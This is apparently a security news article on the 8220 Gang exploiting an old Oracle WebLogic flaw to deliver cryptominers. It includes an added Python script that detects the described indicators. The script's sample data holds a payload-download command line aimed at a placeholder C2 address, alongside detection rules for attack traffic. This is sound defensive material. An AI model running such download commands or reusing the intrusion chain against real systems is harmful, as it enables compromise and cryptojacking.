Script kiddie group 8220 has matured and taken up attacks on new targets

The group, previously focused on cloud technologies, may have changed its goals in exploiting Oracle technologies.

Trend Micro researchers have described a new campaign by the 8220 Gang (8220 Mining Group), in which the attackers exploited a six-year-old Oracle WebLogic vulnerability to deliver a cryptominer to the infected system.

The attacks used CVE-2017-3506 (CVSS: 7.4), a vulnerability in the WLS Security component of Oracle WebLogic that allows remote attackers to execute arbitrary commands via an HTTP request containing a specially crafted XML document. The flaw makes it possible to gain unauthorized access to confidential data or to compromise the system.

The 8220 Gang targeted the HTTP URI "wls-wsat/CoordinatorPortType" to break into the system. After gaining access, the attackers delivered a PowerShell script that downloaded an executable file (including cryptominers) from the IP address of the command-and-control (C2) server.

The downloaded file loads a DLL that is injected into the MSBuild process. The DLL is heavily obfuscated to hinder analysis. Its configuration data is Base64-encoded, and the subsequent connection is made to one of three C2 servers, all on TCP port 9090, 9091 or 9092, to download the cryptominer.

In recent attacks the group also used "lwp-download", a Linux utility that downloads a file from a specified URL. Researchers have also observed this utility being used to compromise Windows systems.

Abuse of "lwp-download" to compromise and target other platforms can be expected in the near term. Despite reusing tools and C2 servers, the 8220 group has begun attacking Windows systems and using new files and C2 servers to evade detection.
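The attack chain in the preceding paragraphs suggests three host- and network-side detections. The following Python script is an added example, not code from the article or from Trend Micro: it scans constructed sample telemetry (assumed log formats, fictional hostnames and RFC 5737 addresses) for the three indicators the article names, that is requests to the wls-wsat/CoordinatorPortType endpoint, MSBuild.exe connecting outbound to TCP 9090, 9091 or 9092, and lwp-download executing on a Windows host.

```python
"""Detection sketch for the 8220 Gang tradecraft described above.

Added example, not Trend Micro's or the article's own code. Log formats,
hostnames, IP addresses and file paths below are constructed assumptions.
"""
import re
from typing import Dict, List

# Indicators taken from the article.
WEBLOGIC_WSAT_PATH = "/wls-wsat/CoordinatorPortType"
C2_PORTS = {9090, 9091, 9092}

# Constructed sample records (assumed formats, fictional hosts and IPs).
ACCESS_LOG = [
    '203.0.113.7 - - [10/May/2023:12:00:01 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 512',
    '198.51.100.3 - - [10/May/2023:12:00:05 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4096',
]
ENDPOINT_EVENTS: List[Dict] = [
    {"host": "WIN-BUILD01", "os": "windows", "type": "net_connect",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "dst_ip": "192.0.2.10", "dst_port": 9091},
    {"host": "WIN-BUILD01", "os": "windows", "type": "net_connect",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "dst_ip": "192.0.2.50", "dst_port": 443},
    {"host": "WIN-APP02", "os": "windows", "type": "process_start",
     "image": r"C:\Strawberry\perl\bin\lwp-download.bat",
     "cmdline": "lwp-download http://192.0.2.10:9090/payload.exe"},
    {"host": "LNX-WEB01", "os": "linux", "type": "process_start",
     "image": "/usr/bin/lwp-download",
     "cmdline": "lwp-download https://cpan.example/mirror.tgz"},
]

# Common-log-format style access line: client, identity, user, time, request, status.
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines: List[str]) -> List[Dict]:
    """Flag any request whose path starts with the WS-AT coordinator endpoint.

    Most WebLogic deployments never receive legitimate traffic there, so a
    hit is worth triage regardless of method or response status.
    """
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        if path.startswith(WEBLOGIC_WSAT_PATH):
            hits.append({"rule": "weblogic_wsat_request", "src": m.group("src"),
                         "method": m.group("method"), "path": path,
                         "status": int(m.group("status"))})
    return hits


def _basename(image: str) -> str:
    # Normalise Windows and POSIX paths to a lower-case file name.
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def scan_endpoint_events(events: List[Dict]) -> List[Dict]:
    """Flag MSBuild.exe egress to the article's C2 ports and lwp-download on Windows."""
    hits = []
    for ev in events:
        image = _basename(ev.get("image", ""))
        if ev["type"] == "net_connect" and image == "msbuild.exe" \
                and ev.get("dst_port") in C2_PORTS:
            hits.append({"rule": "msbuild_c2_port", "host": ev["host"],
                         "dst": f'{ev["dst_ip"]}:{ev["dst_port"]}'})
        # lwp-download is a Perl/Linux tool; on a Windows host it is anomalous.
        if ev["type"] == "process_start" and ev.get("os") == "windows" \
                and image.startswith("lwp-download"):
            hits.append({"rule": "lwp_download_on_windows", "host": ev["host"],
                         "cmdline": ev.get("cmdline", "")})
    return hits


def run_all() -> List[Dict]:
    """Run both scanners over the constructed samples and return all hits."""
    return scan_access_log(ACCESS_LOG) + scan_endpoint_events(ENDPOINT_EVENTS)


if __name__ == "__main__":
    for hit in run_all():
        print(hit)
```

Against the constructed samples the script reports three hits: the POST to the WS-AT endpoint, the MSBuild.exe connection to port 9091 (the connection to 443 is not matched), and the lwp-download launch on WIN-APP02; the Linux lwp-download invocation is left alone because the utility is native there. In a real deployment, feed the web-access and EDR process/network telemetry in place of the sample lists and treat the port list as a starting point, since the article notes the group rotates C2 servers.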

Earlier, researchers at Fortinet FortiGuard Labs reported that the 8220 Gang cryptomining group was delivering a new crypter, ScrubCrypt, to compromised systems to carry out cryptojacking. That attack chain also begins with the exploitation of Oracle WebLogic servers to download PowerShell scripts hosting ScrubCrypt.

Experts describe 8220 as low-skilled, financially motivated hackers who break into AWS, Azure, GCP, Aliyun and QCloud hosts using vulnerabilities in Docker, Redis, Confluence and Apache. The group also has its own cryptominer, PwnRig, based on the XMRig miner; PwnRig uses a fake FBI subdomain whose IP address points to a Brazilian government resource.

Author: DeepWeb